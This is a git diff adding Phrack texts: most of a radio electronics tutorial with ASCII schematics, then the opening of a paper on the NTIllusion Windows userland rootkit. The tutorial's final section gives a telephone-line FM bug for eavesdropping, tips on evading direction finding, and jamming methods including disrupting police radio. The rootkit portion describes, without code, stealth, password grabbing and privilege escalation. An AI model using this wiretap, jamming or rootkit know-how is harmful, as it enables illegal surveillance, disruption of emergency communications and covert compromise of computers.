+at quite a distance apart.  It just so happens that for this task, to
+maximise broadcast of radio waves, the world's largest plate can be used
+to take the place of one plate of the capacitor -- the Earth!  The other
+capacitor plate needs just be a suitably lengthed piece of wire, which is
+an equally common sight -- this piece of wire is known as an 'aerial'!
+
+    In real-world radio transmitters, oscillator circuits are used to make
+a small current 'oscillate' in an aerial wire.  Because of the constant
+change of energy form in the oscillator circuit, the current oscillating in
+the length of the wire becomes electromagnetic and is radiated as radio energy.
+
+    Back to the length of the aerial in relation to wavelength; this is
+where the length calculated earlier comes in handy. From the knowledge
+gained here, we can assume an adapted LC oscillator circuit as below.
+
+         
+      Capacitor           Inductor
+
+             ________________
+            |                )
+            |                )
+           ---               )____________  Aerial
+           ---               )
+            |                )
+            |________________)
+
+
+    As a concept, using the adapted LC tuned oscillator circuit above, the
+transmission of radio waves can be thought of like this; radio waves are
+generated due to the propagation of an electric current in an aerial wire.
+It is, as we have learnt, the 'leakage' of electromagnetic energy from
+between the two plates of the capacitor which causes broadcasting of radio
+waves. 
+
+    As oscillations occur in our LC tuned circuit, all available energy is
+stored in the capacitor, followed by energy (electrical current) not leaked
+as electromagnetic waves being fed into the inductor.  This whole process
+measures one oscillation, and once one oscillation is over, the whole
+process repeats itself again, and each time energy is being lost as radio
+waves from the acting 'capacitor' (aerial and Earth). Therefore, it is the
+rate at which the LC circuit is oscillating (the 'frequency') at that
+determines the frequency at which the radio waves are broadcast at -- thus
+determining the RF of the radio signals.
+
+----[ 1.6 - Receiving
+
+    The concept of receiving radio signals is based upon almost the opposite
+of the concepts of transmitting radio waves. In similarity to radio
+transmitters, radio receivers also use an aerial, but for a totally
+different purpose; for detecting the radio signals in the environment. As
+described previously, radio waves are a form of energy, propagated as
+electromagnetic waves through the air. Thus, when radio signals transmitted
+by nearby radio transmitters pass the aerial of the receiver, a *tiny* RF
+alternating current is generated in the aerial wire.  When a signal becomes
+present in the aerial wire, 'wanted' radio frequencies are 'selected' from
+the assortment of RF currents in the aerial, using a 'tuned circuit'.
+
+    As an example, we'll focus on the LC tuned circuit as in the previous 
+section, due to the simplicity of this circuit. RF current of the 'wanted'
+frequency can be selected from amongst the other RFs by use of an LC tuned
+circuit, which is set to resonate at the frequency of the 'wanted' radio
+frequency.  This selection is done because the LC tuned circuit has low
+impedance at any frequencies other than the 'wanted' frequency. Frequencies
+other than the 'wanted' frequency are prevented from passing through the
+circuit because they are 'shorted out' due to low impedance of the LC
+circuit at any other frequency than the resonant frequency (the frequency
+of the 'wanted' signals).
+
+    Following the selection of correct radio frequencies from the other RF
+signals, the radio receiver will usually amplify the signal, ready for
+demodulating.  The technique which is adapted by the receiver for
+demodulating the radio signal into the modulating signal is totally
+dependant on the type of modulation being used in the received radio
+wave.  In the case of an AM radio receiver, a selected signal will be
+'rectified' and thus demodulated, using a low-drop germanium diode. This
+process basically turns the alternating RF current back into a direct DC
+current, which represents the power strength of the AM signal.  Next, the
+RF component is generally removed by using a capacitor. The output product
+of this process is a recovered modulating signal which can be fed to a pair
+of high impedance headphones.  The diagram below represents how the
+selected RF current is rectified by the diode.
+
+                                                     
+  ||\\  //\\ ----------------------|>|--------------- ||\\ //\\
+  || \\||  \\                                         || \\||  \\
+  \/\/\/\/\/\/
+
+AM Modulated Carrier  diode                     Modulating signal
+                                              (RF carrier present)
+
+
+    After being rectified by the diode, the AM radio signal is still not
+suitable to be fed to an audio output, as the RF carrier is still present.
+The RF carrier can be removed by using a single capacitor.
+
+                                    | |
+||\\  //\\  ------------------------| |---------------------  /\  /\
+|| \\||  \\                         | |                      /  \/  \
+
+Modulating signal                  capacitor          Modulating signal
+                                                    (RF carrier removed)
+
+
+    The output of the capacitor is a recovered modulating audio waveform
+which is suitable for passing to an audio output device, such as a set
+of headphones with a high impedance.
+
+    This technique is likely to be the simplest way to create an AM radio
+receiver, commonly known as the 'crystal set', used by the mass in the
+1920s.  Other receivers are more often used to produce a higher quality of
+audio output, such as TRFs (Tuned Radio Receivers) and Superhetrodyne
+receivers.
+
+    The whole system model of a radio receiver at its most basic level can
+be thought of as the below diagram.
+
+
+         Modulated Radio Signal
+(electric current generated in aerial wire by radio wave)
+                  |
+                 \|/
+            Signal amplified
+                  |
+                 \|/
+           Signal demodulated
+                  |
+                 \|/
+          Modulating signal
+
+
+    Although the techniques and components needed to achieve each step of
+the diagram are different, most receivers stick to this sort of system. 
+Other types of receivers and their circuits are discussed more indeph in
+the section they are related to.
+
+
+--[ 2 - AM Radio
+
+----[ 2.1 - What is AM Radio?
+
+    AM Radio refers to any form of technology which makes use of Amplitude
+Modulation to modulate the 'carrier' with information. To package a radio
+wave with often complex signals, the carrier of a radio wave is shifted in
+power very slightly in sympathy with a modulating audio or data signal.
+Next to morse code, AM is one of the simplest forms of modulation, and with
+this, comes its disadvantages.
+
+----[ 2.2 - Modulation
+
+     AM Modulation involves nothing more than shifting the power of a radio
+wave's carrier by tiny amounts, in sympathy with a modulating signal.
+Amplitude, as you probably already knew, is just another word for 'power'.
+
+     The simplicity of AM modulation can be demonstrated with a simple
+diagram like the one below.
+
+
+||\\    ///\    //\\
+|| \\  //  \\  //  \\  --->  \  /\  /  --->     \\    \\
+||  \\\/    \\\/    \\        \/  \/            \\ ///\\
+                                                \\// \\
+                                                
+     RF Carrier            Modulating signal        AM signal
+
+
+     As you can hopefully make out from the diagrams, whenever the
+modulating signal (the signal which we are modulating) increases in
+voltage, the amplitude (power) of the RF carrier is increased in sympathy
+with the modulating signal.  When the voltage of the modulating signal
+declines in voltage, the opposite of above happens.  After AM modulating
+the carrier, the signal has usually twice the 'bandwidth' of the original
+modulating signal.
+
+
+----[ 2.3 - Demodulation
+
+    When an AM designed radio receives a radio wave, as previously noted,
+a small RF alternating current is generated in the aerial wire.  Because of
+the AM modulation of the carrier applied by the sending transmitter, the
+voltages in the carrier are larger and smaller than each other, but in
+equal and opposite amounts.  As a result, to recover the modulating signal,
+either the positive or the negative part of the modulated signal must be
+removed. In the simplest AM radio receivers, the modulated signal can be
+'rectified' by making use of a single germanium low-drop diode.
+
+  
+\\/\/\/\/\
+ \\  /// //    ---------------------|>|----------------- \\  ///  //
+  \\// \\/                                                \\// \\//
+                                                   
+AM radio signal                  diode         Modulating signal
+
+
+
+    Here, part of the carrier has been removed, resulting in recovery, or
+'rectification' of the modulating signal.
+
+    Because the carrier frequency (the RF of the radio wave) is usually
+significantly greater than the modulating frequency, the RF carrier can be
+removed from the resultant modulating signal, using a simple capacitor.
+
+
+\\        //                   |  | 
+\\  ///  //    ----------------|  |----------------  \  /\  /
+ \\// \\//                     |  |                   \/  \/
+
+
+Modulating signal           capacitor             Modulating signal
+(with RF carrier)                                (without RF carrier)
+
+
+    By exposing the rectified signal to a capacitor, the audio signal (or
+otherwise data signal) is smoothed, producing a higher quality of audible
+output.  At this point, the modulating signal is more or less recovered.
+
+    Although this technique of AM demodulation can be made to work to a
+satisfactory level, the vast majority of commercial radio receivers now
+adopt a design known as 'superhet', which I will explain briefly here.
+
+    Superhet receivers are based upon the principle of 'mixing' two signals
+to produce an intermediate frequency. The diagram illustrates a superhet
+receivers operation.
+
+
+Carrier in ---> Tuned circuit  ---> Mixer ---> IF amplifier ---> Detector 
+              (selects correct RF)    |                           |
+                                      |                           | 
+                                      |                           |
+                               Local oscillator               Audio Amp
+                                                                  |
+                                                                  |
+                                                                +--+
+                                                                |  |
+                                                                +--+
+                                                                \__/
+                                                      
+    As we can see, superhet demodulation is significantly more complex than
+'rectification'.  Superhet receiver systems, like the above system diagram,
+works basically as follows.  First, an RF alternating current becomes
+present in the circuit, because of the electromagnetic activity around the
+aerial.  Signals of the correct radio frequency are selected via a tuned
+circuit, and inputted into one input pin of the 'mixer'.  In the meantime,
+the other input of the mixer is occupied by the 'local oscillator', which
+is designed to be oscillating at a frequency just lower than the inputted
+radio frequency. The output of the mixer is known as the 'Intermediate
+Frequency' (IF), which is the difference between the local oscillator
+frequency, and the frequency of the received AM radio signal. Next, the
+'IF' is amplified, and passed to an 'envelope detector'. The output of the
+envelope detector is the modulating audio signal (an AF -- Audio Frequency),
+which is in turn amplified, and outputted to the user via a loudspeaker or
+other audio output device.
+
+    Since the local oscillator is almost always set to oscillate at a
+frequency of approximately 465KHz *below* the frequency of the carrier
+input, the output of the mixer will always be a 'carrier' of 465KHz --
+which still carries the modulated information.  After the signal is
+amplified by the IF amplifier(s) (there can be more than one IF amplifier),
+the signal is now demodulated by the detector -- which is often just a
+single diode.  As mentioned above, the modulating signal recovered by the
+system can be fed to an amplifier, followed by an audio output device.
+
+    As well as producing a higher quality of audio signal, superhet
+receivers also eliminate the need to be able to tune multiple tuned
+circuits in a TRF (Tuned Radio Receiver).  TRF designs become awkward
+when it comes to tuning them into different radio frequencies because
+of the many tuned circuits needed -- superhets overcome this problem
+as they always 'know' what the collector load will be -- a 465KHz signal.
+Superhet designs can also be adapted to work with FM radio signals, assuming
+the 'detector' is changed to a suitable detector for FM signals (i.e phase detector).
+
+
+----[ 2.4 - Circuits
+
+    Since radio technology is a frequently discussed topic across the
+Internet, many radio circuit design implementations are readily available,
+ranging from very simple circuits, to quite complex ones. Here I present
+some radio related circuits which most people with a bit of electronics
+knowledge and the right components can build.
+
+
+------[ 2.4.1 - Receivers
+
+    Discussed above was the historic 'crystal set' radio receiver, which
+allows anyone with a long enough aerial wire and a few components to
+listen to AM radio bands.  Below is the basic crystal set radio
+receiver circuit, which is very easy to construct.
+
+
+    Aerial Wire             D1 *
+        |            Q1
+        |               ____|>|__________________
+        |_____________|/             |          |
+        |             |\             |          |
+ _______|_____          |            |          |
+(             |         |            |          |
+( L1         --- C1 *   |        C2 ---         0  high impedance
+(            ---        |           ---         0  headphones
+(             |         |            |          |
+(_____________|         |            |          |
+        |               |            |          |
+        |_______________^____________|__________|
+        |               | (not joined)
+        |_______________|
+        |
+       GND
+
+- C1 should be a variable capacitor to allow the station to tune into
+  other frequency bands.
+
+- D1 should be a low-drop germanium diode -- non-germanium diodes
+  won't work.
+
+
+    From previous discussion, we can figure out that the above 'crystal
+set' AM radio receiver works as follows; incoming radio waves generate a
+tiny alternating current in the aerial wire, from which 'wanted' radio
+frequencies are selected, by the tuned LC circuit. Selected current passes
+through a diode, which 'rectifies' the signals, thus demodulating them.
+Before the diode, there is a simple transistor, which amplifies the
+'wanted' frequency. The only reason for this is to make the quality of
+sound slightly better. Any remaining RF components are removed using a
+single capacitor -- this consequently has the effect of smoothing out the
+signal. The product audio signal is passed to a set of headphones -- these
+*must* be high-impedance, or nothing audible sounds on the headphones.
+
+    As was noted earlier, this type of receiver was used frequently in the
+1920s, and gave even newbie electronic enthusiasts of that time the
+opportunity to build something that would be considered very useful at that
+time.  To make decent use of the 'crystal set' circuit, around 60-70 turns
+of wire around a rod of ferrious metal would create a good aerial.
+
+    Designs like above are never used in commercial radio receivers anymore.
+Excluding superhet receivers, TRFs are occasionally used to produce low
+quality radio receivers. Below is a simple TRF receiver schematic.
+
+        
+
+        Aerial
+
+           |              C5*   C6   +9V
+           |        ________________________________________
+           |        |     |    |       )                    |
+           |        |    ---  ---      )  LC2              |-|
+           |        |    ---  ---      )                 __| |
+           |        |     |____|_______)                 | |_|
+           |        |        |                           |  |   C8
+          ---  C1   |        |            D1     C7      |  |___| |____0
+          ---      _|_     Q1_____________|>|________| |_|_|/   | |    0
+  LC1      |    R1 | |      /                  |     | |   |\ Q2
+  _________|__     |_|  __|/                   |            |  High impedance
+  |           )     |  |  |\_____              |            |  headphones
+  |           )     |  |        |              |            |
+  |           )     |  |        |              |            |
+ ---  C2 *    )___| |__|_       |              |            |
+ ---          )   | |    |      |              |            |
+  |           )   C3     |      |              |            |
+  |___________)          |      |    C4        |            |
+                         |      |_____         |            |
+                         |      |    |     R4  |-|      R6 |-|
+                    R2  |-| R3 |-|  ---        | |         | |
+                        | |    | |  ---        |_|         |_|
+                        |_|    |_|   |          |           |
+                     ____|______|____|_________ |___________|
+
+                                      0V
+
+
+- C2 should be a variable capacitor
+- C5 and C6 should be variable capacitors
+- Resistors of sensible values should suffice
+- Capacitors of sensible values should suffice
+
+
+     As in the 'crystal set' receiver, when a radio signal is 'picked up'
+by the aerial, the proper frequency is selected using the LC tuned
+circuit.  The signal is passed to a transistor amplifier.  However,
+this time, the transistor amplifier has a 'tuned collector load',
+because of the tuned LC circuit (LC2) at the collector leg of the
+transistor.  Next, the signal is rectified, stored in a few capacitors
+until enough current has collected, and is eventually fed to the user
+with the high impedance headphones.  The use of the tuned collector
+load at the transistor causes for the receiver to be more precise,
+amplifying only the signals which are at the frequency of LC2's
+resonant frequency.  As expected, this causes for a higher quality of
+audio signal to be fed into the users headphones, making this a much
+better radio receiver.
+
+     A few things can be done to improve the above receiver, such as adding
+yet more tuned amplifiers, and perhaps adding a few more resistors and
+capacitors for safety and efficiency purposes.
+
+
+
+------[ 2.4.2 - Transmitters
+
+    All that we really need to do when designing a simple radio transmitter
+is keep in mind that we require an oscillator -- either tuned or crystal
+controlled -- and a series of amplifier circuits which boost our signal.
+After these stages, all that is left is to make the signals oscillate in
+the aerial wire.
+
+Below is a simple radio transmitter schematic.
+                                                      
+                                                                 Aerial
+
+                                                                     |
+                                                                     |
+  ___________________________________________________________________|
+ |                        |                 |       |         |      |
+ |                        |                 |       |         |      |
+ |                     L1 )                 |       |         |   L3 |
+ |                        )          R3    |-|   C3 |         |__    )
+|-|  R1   Crystal         )                | |     ---        |  |   )
+| |_________|_____________)                |_|     ---        |  | C5)
+|_|        |||            |                 |       |         | ---  )
+ |                        |_______| |_______|_AM ___|_______|/  ---  |
+ |                       /        | |         Modulator     |\___|___|
+ |__________| |________|/         C2                      Q2    |    |
+ |          | |        |\   Q1                          (PNP)   |    )
+ |          C1           |                                     ---   )
+ |                      |-|                                 C4 ---   )
+ M                      | |  R4                                 | L2 )
+ |                      |_|                                     |    |
+ |                       |                                      |    |
+ |                       |                                      |    |
+ |_______________________|______________________________________|____|
+
+
+- TR2 is a PNP transistor
+- M is a microphone
+
+    This circuit works by oscillating at the frequency controlled by the
+crystal (27MHz would be legal in the UK), amplifying the signal with tuned
+collector loads at the transistor (TR1), and then by radiating the signal
+off as radio waves by oscillating the signal in the aerial wire. Amplitude
+modulation is added to the signal by varying the gain of the transistor
+driver, by connecting it to the output of a microphone. The above circuit
+is quite inefficient, and is likely to produce low quality signals, but it
+can be used as a starting point to building a simple AM radio transmitter.
+It's probably illegal to operate the above circuit on frequencies requiring
+a license, so some countries *require* the circuit to be crystal controlled
+on a 'model radio' RF.  One improvement to be made on the schematic is to
+amplify the output of the microphone before feeding it to the transistor
+driver.
+
+    Possible devices which could apply the AM modulation are audio
+amplifiers, or even op-amps.  An audio amp following the oscillator
+would produce a higher quality, stronger signal, but would also provide
+power gain (i.e amplitude gain), in sympathy with the audio signal produced
+by the microphone.  This gain of amplitude due to the audio amp has
+essentially applied Amplitude Modulation of the carrier signal,
+because the power of the signal has been altered according to the
+inputted audio signal (at the microphone).  An ordinary op-amp could
+be used in a similar way, but by substituting the non-inverting input
+pin with a suitable power supply.  Essentially, this would cause for
+an outputted gain from the op-amp, according to the audio signal,
+because the two inputs to the op-amp are compared, as such.
+
+
+
+--[ 3 - FM Radio
+
+----[ 3.1 - What is FM radio?
+
+    FM radio just means any form of technology which makes use of radio
+with FM modulated signals. To modulate a radio wave's carrier with
+information, FM transmitters shift the frequency of the carrier very
+slightly, to be in sympathy with a modulating signal.
+
+
+----[ 3.2 - Modulation
+
+    FM modulation consists of little more than shifting a radio wave's
+carrier frequency very slightly in sympathy with a modulating signal's
+frequency.
+
+Modulation of an example audio signal is shown in the figures below.
+
+
+||\\    ///\    //\\
+|| \\  //  \\  //  \\  --->  \  /\  /  --->       ||\\  /\\  //
+||  \\\/    \\\/    \\        \/  \/              ||\\ //\\ //
+                                                  ||\\// \\//
+                                                
+     RF Carrier            Modulating signal        FM signal
+
+    The diagrams show that when the frequency of the modulating signal
+increases, so does the given carrier frequency, and the opposite when
+the modulating signal's frequency decreases. This is shown in the FM
+signal diagram by the bands being spaced widely apart when the modulating
+signal frequency is increasing, and more closely together when the
+modulating signal's frequency is decreasing.
+
+
+----[ 3.3 - Demodulation
+
+    When an FM modulated carrier signal is detected by the receiver's
+aerial wire, in order to recover the modulating signal, the FM modulation
+must be reversed.
+
+    Most modern FM radio receivers use a circuit called the 'phase-locked
+loop', which is able to recover FM modulated radio signals by use of a VCO
+(Voltage Controlled Oscillator), and a 'phase detector'. Below is the
+system diagram of a PLL suitable for use in FM radio receivers.
+
+
+    FM signal in -------------> Phase  ---------------
+                                Detector             |
+                                  |                  |
+                                  |                  |
+                                  |                  |
+                                  |                  |
+                                 VCO                 | 
+                                  |__________________|
+                                                     |
+                                                     |
+                                                     |
+                                                     |
+                                                     |
+                                            Modulating signal
+                                                   out
+
+
+    The above PLL is able to recover the modulating signal by having one
+input to a phase detector as the modulated carrier, and the other input as
+a VCO oscillating at the frequency of the RF carrier. The phase detector
+'compares' the two frequencies, and outputs a low-power voltage relative to
+the difference between the two 'phases', or frequencies. In essence, the
+outputted voltage will be relative to the frequency by which the carrier's
+frequency was shifted during modulation by the transmitter.  Therefore, the
+output of the PLL, known as the 'phase error', is the recovered modulating
+signal. In addition to being outputted from the small system, the voltage
+is also given to the VCO as 'feedback', which it uses to 'track' the
+modulation.  Acting upon the feedback received, the frequency of
+oscillation is altered accordingly, and the process is repeated as
+necessary.
+
+    In the past, less efficient and reliable circuits were used to
+demodulate FM radio signals, such as the 'ratio detector'. Although the
+'ratio detector' is less sophisticated than PLL methods, a functioning
+ratio detector circuit is actually a little more complex than PLLs.
+
+    It should be noted that superhet receivers, touched upon a little
+earlier, can also be used as FM radio receivers, but their 'detectors' are
+different to that of an AM superhet -- for example, a PLL circuit or ratio
+detector discussed here could be used in conjunction with a superhet
+receiver to make an FM radio. This is the method which is actually adopted
+by most commercial radio receiver manufacturers.
+
+----[ 3.4 - Circuits
+
+
+------[ 3.4.1 - Transmitters
+
+    The same general principles apply to FM radio transmitters as they do
+to AM radio transmitters, except that information must be modulated in a
+different way.  In AM radio transmitters, the carrier frequency is more or
+less always constant.  However, in FM transmitters, the whole principle is
+to alter the carrier frequency in small amounts. This means that a tuned
+oscillator circuit is not appropriate, because we need to alter the
+frequency accordingly, not transmit at one static frequency.  The method
+used to overcome this problem is discussed a little later. A simple FM
+transmitter schematic diagram is presented below.
+
+
+                                                                    Aerial
+                                                                       |
+                                                                       |
+                                                                       |
+   ____________________________________________________________________|
+  |                               |                 |    |      |      |
+  |                               |                 |    |      |      )
+  |                               )                |-|  --- C3  |      )
+  |  R1                      L1   )             R3 | |  ---     |_ C4  )
+ |-|                              )                |_|   |      | |    )
+ | |                              )                 |    |      | ---  |
+ |_|               |   Crystal    |         C2      |    |      | ---  | L2
+  |_______________|||_____________|___________| |___|____|____|/   |   |
+  |                              /            | |             |\___|___| 
+  |____________| |_____________|/                                      |
+  |            | |             |\  Q1                         Q2       |
+  |                              |                                     |
+  |            C1                |                                     |
+  M                             |-|                                    |
+  |                             | | R2                                 |
+  |                             |_|                                    |
+  |                              |                                     |
+  |______________________________|_____________________________________|
+
+
+    When audio signals are produced by the microphone, current carrying
+audio frequencies are amlified, and are used to modulate the radio
+wave.  Since the microphone does this all for us, there is no need to
+use modulation modules, ICs, or other technology.  In situations where
+an elecret microphone is not available to do the modulation for us, a
+varactor diode can be used to vary the capacitance in an oscillator
+circuit, depending on the amplitude of a modulating signal.  This
+varies the oscillation frequency of the oscillator circuit, thus
+producing FM modulation.
+
+
+
+--[ 4 - Misc
+
+----[ 4.1 - Pirate Radio
+
+    Pirate Radio stations are simply just radio stations ran by
+individuals who are not licensed amateur radio enthusiasts.  Although
+radio is actually a natural resource, it has been illegal for a
+significant amount of time in some countries to transmit radio waves
+on certain frequencies.  Although transmitting radio signals on
+certain frequencies (around 27MHz) is legal in places like the UK,
+strict FCC regulations kick in, almost limiting the threshold to
+useless.  Because of this limitation, radio enthusiasts all around the
+globe see fit to set up pirate radio stations, which they use for
+their enjoyment, playing their favourite music tracks to the 'public',
+and for a breeding ground for aspiring DJs.  Some 'pirate radio'
+stations keep within the FCC terms, by transmitting at low-power.
+These types of stations are often referred to as 'free radio', or
+'micropower stations'.
+
+    The legality of pirate radio stations is questionable, but varies from
+country to country.  In some European Countries, you can be arrested
+for just owning an unregistered transmitter.  In Ireland, prosecution
+rarely takes place if registered radio stations are not affected, but
+it is still illegal.  The US allows transmission of radio signals at
+*microscopic* power, making the limitations almost useless for
+unlicensed radio enthusiasts, thus causing them to resort to pirate
+radio.
+
+    Contrary to popular belief, setting up a pirate radio station is not
+necessarily a difficult task.  At the minimum, someone wanting to
+setup a pirate radio station would need the following pieces of
+equipment:
+
+- Stereos, CD Players, Microphones, etc.
+- Audio Amp
+- Audio Mixer
+- Transmitter
+- Aerial
+
+    Stations using only the above equipment can sometimes sound quite
+crude, and might interfere with other legal radio stations.  To avoid
+this, a 'compressor' can be used, which also limits the noise created
+by sudden loud noises in the background.
+
+    Although any of the example transmitters in this article probably
+wouldn't be sufficient enough to transmit music audio signals over the
+air, but they could be used as a starting point to building your own, more
+efficient kit.  Additionally, FM and AM radio kits can be purchased,
+which anyone with a soldering iron can build.
+
+    The length and height of the antenna depends entirely on how far the
+radio signals need to be transmitted.  By reading the previous
+sections, some information on getting a correctly sized aerial can be
+gained.  For example, a quick and dirty aerial for an AM pirate radio
+station could be around 15-20 feet tall.
+
+    To avoid being busted, it is probably a good idea to stay within the
+legal power limits.  Otherwise, a Direction Finding device used by the
+authorities could easily track down the exact location of the
+transmitter.
+
+
+
+----[ 4.2 -  Wireless Telephone Tapping
+
+    'Beige boxing' has long been the easiest and most exploited way to tap
+telephones, interrupt on neighbours conversations, and use enemies
+phone lines to make long distance calls to your friend in Australia.
+However, since beige boxing requires the phreak to lurk around like a
+ninja, a safer method can be used, which doesn't require you to be
+physically close to the target phone line.
+
+    As expected, audio signals on a target phone line can be transmitted as 
+radio signals at an arbitrary frequency, and be received by any phreak with 
+an FM radio receiver.  Although this concept is not new, it serves as an 
+interesting and useful project for radio newbies to try out.  Below is a 
+simple FM phone bug transmitter circuit.
+
+                  __________________________________________________________
+                  |                    |                                    |
+                  |                    |                                    |
+IN (green) ___.___|_______            |-|                                   |
+              |   |       |           | |                                   |
+              |  /\  LED  |           |_|                                   |
+              |  ---     | |           |___| |      op-amp                  | 
+              |   |   C1 | |           |   | |---|\                         |
+              |   |       |__________|/      ____| >------- Aerial          |
+IN (red) _____|___|                  |\ _____|___|/                         |
+              |   |                    |     |   |                          |  
+              |   |                    |     |   |                          |
+OUT (green) __|   |                    (     |   |                          |
+                 /\                    (     |  /\  varactor                |
+                 ---                   (     |  ---                         |
+                  |                    (     |   |                          |
+OUT (red) ________|____________________|_____|___|__________________________|
+
+
+- inductor should be about 8 turns of wire
+- aerial should be about 5 inch long
+
+
+    By interchanging the varator with a crystal, or by using a variable
+capacitor, the frequency band on which the bug transmits line activity
+could be changed accordingly.  The varactor making up part of the
+oscillator circuit is intended to alter the frequency of oscillation,
+depending on the audio signal inputted from the green wire of the
+telephone line.  The varactor diode can be thought of as an
+electrically variable capacitor, which in this case alters its
+capacitance in sympathy with the audio frequency on the telephone
+line -- causing for change of oscillation frequency, and thus
+frequency modulation.  
+    The following op-amp provides additional strength to the
+signal, in an attempt to avoid a weak, unreliable signal.  For
+user-friendly purposes, the LED connecting to the red wire of the line
+pair should illuminate when a signal is present on the line.
+
+    The above circuit can be modified to be made more efficient, and a
+longer aerial is an obvious way of lengthening the range of
+transmission.  If a phreak was to contruct and use a device like this,
+all they would need is an FM radio to tune into the correct
+frequency.  There are much better designs than the minimalistic one
+above -- if a practical FM telephone bug is required, many plans are
+available.
+
+
+----[ 4.3 - Jamming
+
+    Technically, all it takes to carry out 'radio jamming' is to transmit
+noise at a desired frequency.  For example, if a person in the UK were
+to transmit RF noise at 30MHz+, police radio communications could
+possibly disrupted.  Although the principles are mostly the same,
+there are several different types of jamming.
+
+- modulated jamming
+  This consists of mixing different types of modulation, and
+  transmitting the results at a desired radio frequency.  This is
+  designed to make receiving legimate radio signals hard or next to
+  impossible.
+
+- CW (continuous wave)
+  CW jamming only involves transmitting a consistant carrier frequency
+  once tuned into a RF frequency/band you want to jam.  This again makes
+  receiving desired radio signals particuarly hard.
+
+- Broadband
+  Broadband jammers spread Gaussian noise across a whole band of audio
+  frequencies, blocking legimate audio signals from easy receival.
+
+
+    A basic radio transmitter is easily modifiable, by adding a noise
+generator, to successfully jam arbitrary frequency bands.  Many other
+types of radio jammers exist, and their details are readily available
+on the World Wide Web.
+
+
+--[ 5 - Conclusion
+
+    Radio is an extremely useful technology, which is at least as old as
+the atom.  But we are only just beginning to exploit its full
+usefullness in even new and up and coming technology, and probably
+will do for the next few hundred years.
+
+    As we've discovered, contrary to popular belief, employing the use of
+radio in electronic circuits isn't at all as complicated as one would
+think.  Because of this, the use of radio and be both used and
+exploitfully abused -- only a few basic principles need to be
+understood to make use of this wonderful technology.  Although the
+surface has only been scratched, and way forward is open.
+
+
+--[ 6 - Bibliography
+
+Phrack 60
+Low Cost and Portable GPS Jammer
+<http://www.phrack.org/phrack/60/p60-0x0d.txt>
+
+
+The Art of Electronics
+<http://www.artofelectronics.com>
+
+Updates to the article:
+http://nettwerked.co.uk/papers/radio.txt
+
+
diff --git a/phrack62/12.txt b/phrack62/12.txt
new file mode 100644
index 0000000..b1722a9
--- /dev/null
+++ b/phrack62/12.txt
@@ -0,0 +1,1748 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x0c of 0x10
+
+
+|=---------=[  NTIllusion: A portable Win32 userland rootkit  ]=--------=|
+|=----------------------------------------------------------------------=|
+|=------------------=[  Kdm <Kodmaker@syshell.org>  ]=------------------=|
+
+This paper describes how to build a windows user land rootkit. The first
+part deal with the basis and describe a few methods to show how code
+injection and code interception are possible, while the rest of the paper
+covers the strategy that makes stealth possible in userland. A bigger
+version of the paper is also available at [1] so that novice peoples can
+refer to a preliminary article about injection and interception basics.
+
+
+Table of contents
+
+1. Introduction
+2. Code Injection and interception
+	2.1. System Hooks
+	2.2. CreateRemoteThread
+	2.3. Manipulating thread's context
+	2.4. Redirecting the Import Address Table
+	2.5. Inserting an unconditional jump (jmp)
+3. User land take over
+	3.1. User land vs Kernel land rootkits
+	3.2. Restrictions...
+	3.3. ...and constraints
+	3.4. Setting a global hook to take over userland
+	3.5. Local application take over
+4. Replacement functions
+	4.1. Process hiding
+	4.2. File hiding
+	4.3. Registry
+	4.4. Netstat like tools.
+	     4.4.1. The case of windows 2000
+	          4.4.1.1. Hooking GetTcpTable
+	          4.4.1.2. Defeating netstat
+	          4.4.1.2. Defeating Fport
+	     4.4.2. The case of windows XP
+	4.5. Global TCP backdoor / password grabber
+	4.6. Privilege escalation
+	4.7. Module stealth
+5. Ending
+	5.1. Conclusion
+	5.2. Greets
+6. References
+
+
+-------[ 1. Introduction
+  A rootkit is a program designed to control the behavior of a given 
+machine. This is often used to hide the illegitimate presence of a 
+backdoor and others such tools. It acts by denying the listing of certain 
+elements when requested by the user, affecting thereby the confidence that
+the machine has not been compromised. 
+
+There are different kinds of rootkits. Some act at the very bases of the 
+operating system by sitting in kernel land, under the privileged ring 0 
+mode. Some others run under lower privileges in ring 3 and are called user 
+land rootkits, as they target directly the user's applications instead of 
+the system itself. These ring 3 rootkits have encountered a recrudescence 
+the last years since it is somewhat more portable and polyvalent than ring 
+0 ones.
+As there are multiple ways to stay unseen under windows, this article
+performs a windows rootkitting tutorial based on a strong implementation
+called the [NTillusion rootkit] which fits maximum constraints.
+
+This rootkit has been designed to be able to run under the lowest 
+privileges for a given account under windows. Indeed, it doesn't use any 
+administrative privilege to be able to perform its stealth as it resides 
+directly inside processes that are owned by the current user. In a word, 
+all the ring 3 programs that a user might use to enumerate files, 
+processes, registry keys, and used ports are closely controlled so they 
+won't reveal unwanted things. Meanwhile, the rootkit silently waits for 
+passwords, allowing the load of any device driver as soon as an 
+administrator password is caught.
+
+How does this works?
+All this stuff is done in two steps. First, by injecting the rootkit's 
+code inside each application owned by the current user and finally, by 
+replacing strategic functions by provided ones. Theses tricks are 
+performed at run time against a running process rather than on hard disk 
+on binaries since it allows to work around the windows file protection, 
+antiviral and checksum tools as well. The rootkit has been tested 
+successfully under windows 2000/XP, but may also run on older NTs. It's
+architecture allows it to be ported to windows 9x/Me but some functions
+are missing (VirtualAllocEx) or behave abnormally (CreateRemoteThread) on
+this version of the OS.
+
+This introduction would not have been achieved without comments about the 
+different sections of the paper that present each special characteristics.
+Section 3 deals about user land take over. This mechanism has already been
+presented by Holy_Father in [HIDINGEN]. However it is here done in a 
+different way. In fact, the rootkit acts globally a level higher so things
+are changed and it results in a somewhat simpler but efficient spreading
+method. And contrary to Hacker Defender ([HKDEF_RTK]), NTillusion does not
+need the administrative privilege. So the approach I propose is different.
+This approach is also different when speaking about the way functions are
+chosen and replaced.
+This is the case with section 4 which introduces an uncommon way to 
+replace original functions. On one hand, the functions are most of the time
+replaced at kernel level. So, I hope this paper shows that performing a
+good stealth is possible also in userland. On the other hand when thinking
+about API replacement, people try to dig as much as possible in order to
+hook at the lowest level. This is sometimes a good thing, sometimes not.
+This is especially true with portability, which suffers from this run to
+low level. NTillusion replaces top level APIs as often as possible.
+As windows designers want programs that rely on the documented API to be
+portable from one windows version to another, and as the rootkit hijacks
+critical functions among this documented API, portability is accrued.
+Thereby there's no need to perform OS version check and it results in a
+more universal rootkit. Added to that, this section offers a new way for
+privilege escalation by showing how hooking the POP3/FTP traffic is
+possible in order to get login and passwords. 
+
+This is not the only new thing: section 4.7 offers a new way to hide a DLL
+loaded inside a given process. Usually, this would have been done by
